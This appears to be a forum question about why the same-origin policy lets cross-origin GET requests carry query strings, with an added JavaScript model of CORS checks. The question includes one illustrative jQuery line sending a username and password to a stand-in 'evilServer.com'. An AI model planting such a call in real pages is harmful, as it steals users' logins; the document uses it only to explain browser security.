From what I understand, the same origin policy prevents scripts in a web page from talking to servers outside of the present domain (using POST, XMLHttpRequest, etc.). I assumed that GET requests (with arguments) across domains would also be forbidden. That was until I started to read about using YQL to bypass some restrictions of the same origin policy. The code examples all use an AJAX GET request with parameters.

    $.ajax({
        type: "GET",
        // webServiceQuery holds the YQL statement, built elsewhere
        url: 'http://query.yahooapis.com/v1/public/yql?q=' + encodeURIComponent(webServiceQuery)
    });

So let's say some attacker manages to inject some evil JavaScript into a web page that harvests logins. Something like:

    $.ajax({
        type: "GET",
        url: 'http://evilServer.com?username=PresidentSkroob&password=12345'
    });

The receiving server could log every request that comes its way. Why is this allowed? I understand why you would want to allow data-less GET requests (say importing jQuery), but I don't see a reason to allow query strings to be passed cross domain. Is there a legit reason why most browsers allow this?
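
As an added illustration (not part of the original question), the following simplified model shows what a browser checks for a script-initiated request: a "simple" cross-origin GET is always sent, and the same-origin policy only decides whether the calling script may read the response. The function name `evaluate`, its fields and the sample URLs are assumptions made for this example; credentials and custom request headers are not modelled.

```javascript
// Added illustration: simplified model of same-origin policy and CORS handling
// for XHR/fetch without credentials. Names are hypothetical; the URLs are
// constructed samples. Header and method names are compared case-insensitively
// here for brevity.
const SAFE_METHODS = new Set(["GET", "HEAD", "POST"]);
const SAFE_TYPES = new Set([
  "application/x-www-form-urlencoded", "multipart/form-data", "text/plain",
]);

// An origin is the (scheme, host, port) tuple; URL.origin serializes it.
const originOf = (url) => new URL(url).origin;

// req: { url, method, contentType }
// server: CORS response headers as { allowOrigin, allowMethods, allowHeaders }
function evaluate(pageUrl, req, server = {}) {
  const method = (req.method || "GET").toUpperCase();
  const pageOrigin = originOf(pageUrl);
  if (pageOrigin === originOf(req.url)) {
    return { crossOrigin: false, preflight: false, sent: true, readable: true };
  }
  const type = (req.contentType || "").split(";")[0].trim().toLowerCase();
  const safeType = type === "" || SAFE_TYPES.has(type);
  const simple = SAFE_METHODS.has(method) && safeType;
  const originOk = server.allowOrigin === "*" || server.allowOrigin === pageOrigin;
  const listed = (list, v) =>
    (list || []).some((x) => x === "*" || x.toLowerCase() === v.toLowerCase());
  // A preflight (OPTIONS) must approve the origin, method and Content-Type.
  const preflightOk = originOk &&
    (SAFE_METHODS.has(method) || listed(server.allowMethods, method)) &&
    (safeType || listed(server.allowHeaders, "content-type"));
  return {
    crossOrigin: true,
    preflight: !simple,
    // A simple request leaves the browser before any CORS check, so its URL
    // and query string reach the server whatever the response headers say.
    sent: simple || preflightOk,
    // The calling script can read the response only if the server opts in.
    readable: originOk && (simple || preflightOk),
  };
}

const samplePage = "https://app.example/login";             // constructed
const sampleTarget = "https://api.other.example/v1?q=test"; // constructed
console.log(evaluate(samplePage, { url: sampleTarget }));
console.log(evaluate(samplePage, { url: sampleTarget }, { allowOrigin: "*" }));
console.log(evaluate(samplePage, { url: sampleTarget, method: "PUT" }));
```
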